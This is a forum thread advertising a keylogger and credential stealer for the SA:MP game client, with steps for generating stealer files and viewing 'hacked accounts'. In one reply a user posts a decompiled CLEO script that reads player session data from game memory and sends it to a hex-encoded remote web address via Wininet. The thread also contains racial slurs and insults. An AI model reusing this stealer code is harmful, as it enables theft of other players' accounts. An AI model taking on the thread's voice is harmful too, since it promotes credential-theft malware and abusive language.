SA:MP 0.3.7 Keylogger (Stealer)

Strechea

Active Member
Joined
Jan 26, 2017
Messages
25
Likes
1
Points
18
#1
The moment when you have nothing better to do than doing shitty things.

I see it as an interactive project since no one in my country made something like that. Only russians made it.

This project has no bad intentions, once bought the buyer will get the sources if he wants to, with the conditions he will get his own website and make the connections between in-game code and web (he will get even web source).

Why I made it?
The real and the simplest reason is that because I like new challenges and of course I want to learn something new. If you are a developer, then you will probably understand.

How it works?

Here we will talk about the free version.

1. Disadvantages
- uncrypted file
- CLEO file only with the stealer (so If we ignore the stealer, then the file it's like me falling in a void for eternity)
- no stuffing (like useless/unused code)
- it will expire automatically in some hours (for now I have to disable them manually because I didn't figured out yet how to do something like that)

2. Steps to create a free Stealer (only for CLEO)
- Open this link in a new TAB.
- In the textbox ID you will have to enter a number with 8 digits. Make sure you choose a really hard number so no one will can see your directory.
- Choose the server you want the stealer to work for.
- Choose the stealer type, but since only CLEO is available for now ... I don't think I have to tell you again what you have to choose, no?
- Press the button named `Create`. If everything succeeded you will get a message like: `Client Request: Succeeded!`
- Will be displayed three links. We have to open them in a new TAB (Click 2 on the link --> Open in new TAB)

3. Links:
1. First link will redirect you to //myWebHost//client_directory//client_ID//client_ID.cs and here you will have to download the stealer (Click 2 anywhere in the page and press `Save As` button. Anyone with nigga instincts already knew that)
2. Second link will redirect you to //myWebHost//client_directory//client_ID//client_ID.txt and here will be displayed all your hacked accounts. Everyone who uses the stealer in the server you created it for, all his data will be displayed here.
3. Third link it's your directory. Here you can visit the client_php_file.php.

Some other informations:
You must wait 10~seconds between every created stealer to avoid any @Parazitas abuses, like using all the bandwitdh and storage. You knew how much porn I had there buddy?
And also in the `client_php_file.php` there's a cooldown (120 seconds if I remember well).

Project made by: Popica
 

Attachments

Last edited:

monday

Well-Known Member
Joined
Jun 23, 2014
Messages
1,036
Likes
71
Points
98
20
#3
It would be nice if the code was shared, it would have some educational value, but without it, what's the point? Help random people steal passwords of other players?
 
OP
OP
S

Strechea

Active Member
Joined
Jan 26, 2017
Messages
25
Likes
1
Points
18
#4
It would be nice if the code was shared, it would have some educational value, but without it, what's the point? Help random people steal passwords of other players?
That wouldn't be nice I think.
Actually it's pretty easy to make what I did, anyone can make it if he is a bit open-minded.
 
Last edited:

Hidend

Well-Known Member
Joined
Mar 4, 2013
Messages
521
Likes
19
Points
68
#8
fuck off retarded, anyway if you have at least 2 iq you can search all of this for free using google
 

jksadP23

New Member
Joined
Jul 25, 2019
Messages
4
Likes
0
Points
1
1
#11
//-------------MAIN---------------
0000: NOP
wait 0
call @Noname_1646 0
call @Noname_1506 1 -38
jump @Noname_1838

:Noname_38
wait 0
0AA2: [email protected] = load_library "kernel32.dll" // IF and SET
0AA4: [email protected] = get_proc_address "GetModuleHandleA" library [email protected] // IF and SET
0AA7: call_function [email protected] num_params 1 pop 0 "samp.dll" [email protected]
0A8E: [email protected] = [email protected] + 47806 // int
0A8D: [email protected] = read_memory [email protected] size 1 virtual_protect 1
if
[email protected] == 0
else_jump @Noname_166
0A8E: [email protected] = [email protected] + 2173568 // int

:Noname_166
if
[email protected] == 64
else_jump @Noname_197
0A8E: [email protected] = [email protected] + 2173624 // int

:Noname_197
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] > 1000
else_jump @Noname_1108
0A8E: [email protected] = [email protected] + 985 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] > 1000
else_jump @Noname_1108
0A8E: [email protected] = [email protected] + 20 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] > 1000
else_jump @Noname_1108
0A8E: [email protected] = [email protected] + 34 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] > 1000
else_jump @Noname_1108
if
[email protected] == 0
else_jump @Noname_383
0A8E: [email protected] = [email protected] + 2173504 // int

:Noname_383
if
[email protected] == 64
else_jump @Noname_414
0A8E: [email protected] = [email protected] + 2173560 // int

:Noname_414
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] > 1000
else_jump @Noname_1108
0A8E: [email protected] = [email protected] + 40 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
0A8E: [email protected] = [email protected] + 44 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] == 1
else_jump @Noname_539
if or
[email protected] == 1
[email protected] == 3
else_jump @Noname_539
[email protected] = 1

:Noname_539
if and
[email protected] == 1
not [email protected] == 1
else_jump @Noname_1108
0A8E: [email protected] = [email protected] + 48 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
0A8E: [email protected] = [email protected] + 36 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
if
[email protected] == 0
else_jump @Noname_639
0A8E: [email protected] = [email protected] + 617008 // int

:Noname_639
if
[email protected] == 64
else_jump @Noname_670
0A8E: [email protected] = [email protected] + 515232 // int

:Noname_670
0AA8: call_function_method [email protected] struct [email protected] num_params 0 pop 0 [email protected]
0A8E: [email protected] = [email protected] + 26 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
0A8E: [email protected] = [email protected] + 10 // int
if
not [email protected] >= 16
else_jump @Noname_751
0085: [email protected] = [email protected] // (int)
jump @Noname_763

:Noname_751
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1

:Noname_763
wait 100
0A8E: [email protected] = [email protected] + 710 // int
0A8E: [email protected] = [email protected] + 452 // int
0A8E: [email protected] = [email protected] + 969 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
0A8E: [email protected] = [email protected] + 42 // int
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 1
[email protected] = Player.Money($0[2])
0AC6: [email protected] = label @Noname_1802 offset
call @Noname_1115 0 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
alloc [email protected] 1024
gosub @Noname_1828
alloc [email protected] 456
format [email protected] "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%d&time=%d:%d&data=%d.%d&nn=%s" [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
alloc [email protected] 356
format [email protected] ""
call @Noname_1357 1 [email protected] [email protected]
call @Noname_1430 2 [email protected] [email protected]
free [email protected]
free [email protected]
[email protected] = 0

:Noname_1108
jump @Noname_38

:Noname_1115
0AA2: [email protected] = load_library "kernel32.dll" // IF and SET
0AA4: [email protected] = get_proc_address "GetLocalTime" library [email protected] // IF and SET
alloc [email protected] 32
0AA5: call [email protected] num_params 1 pop 0 [email protected]
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] += 2
0A8D: [email protected] = read_memory [email protected] size 2 virtual_protect 0
[email protected] -= 30
ret 8 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]

:Noname_1357
0AA2: [email protected] = load_library "Wininet.dll" // IF and SET
0AA4: [email protected] = get_proc_address "InternetOpenA" library [email protected] // IF and SET
0AA7: call_function [email protected] num_params 5 pop 0 0 0 0 0 [email protected] [email protected]
ret 1 [email protected]

:Noname_1430
0AA2: [email protected] = load_library "Wininet.dll" // IF and SET
0AA4: [email protected] = get_proc_address "InternetOpenUrlA" library [email protected] // IF and SET
0AA7: call_function [email protected] num_params 6 pop 0 0 0 0 0 [email protected] [email protected] [email protected]
ret 0

:Noname_1506
0A9F: [email protected] = current_thread_pointer
[email protected] += 16
0A8D: [email protected] = read_memory [email protected] size 4 virtual_protect 0
0062: [email protected] -= [email protected] // (int)
0AA7: call_function 4607008 num_params 1 pop 1 [email protected] [email protected]
005A: [email protected] += [email protected] // (int)
[email protected] += 16
0A8C: write_memory [email protected] size 4 value [email protected] virtual_protect 0
[email protected] += 44
[email protected] = 0

:Noname_1597
0A8C: write_memory [email protected] size 4 value [email protected]([email protected],30i) virtual_protect 0
[email protected] += 4
[email protected] += 1
[email protected] > 30
else_jump @Noname_1597
ret 0

:Noname_1646
0AA2: [email protected] = load_library "kernel32.dll" // IF and SET
0AA4: [email protected] = get_proc_address "GetModuleHandleA" library [email protected] // IF and SET
0AA7: call_function [email protected] num_params 1 pop 0 "samp.dll" [email protected]
[email protected] += 371500
0A8C: write_memory [email protected] size 4 value -1869574000 virtual_protect 1
[email protected] += 4
0A8C: write_memory [email protected] size 1 value 144 virtual_protect 1
[email protected] += 9
0A8C: write_memory [email protected] size 4 value -1869574000 virtual_protect 1
[email protected] += 4
0A8C: write_memory [email protected] size 1 value 144 virtual_protect 1
ret 0

:Noname_1802
hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end

:Noname_1828
[email protected] = 637
return

:Noname_1838
end_thread
















hex
68 74 74 70 3A 2F 2F 64 73 74 65 61 6C 2E 72 75
2F 61 64 64 2E 70 68 70 3F 00
end
is
http...
This is where it sends files to
 
OP
OP
S

Strechea

Active Member
Joined
Jan 26, 2017
Messages
25
Likes
1
Points
18
#12
News:

1. Added ASI Stealer type for most servers except OG-Times (still working for).
2. Added a link and once you will open it, the stealer will automatically start to download (the manually link it's still here in case the server is busy (ya, some trollers, they are even there!))
 
Top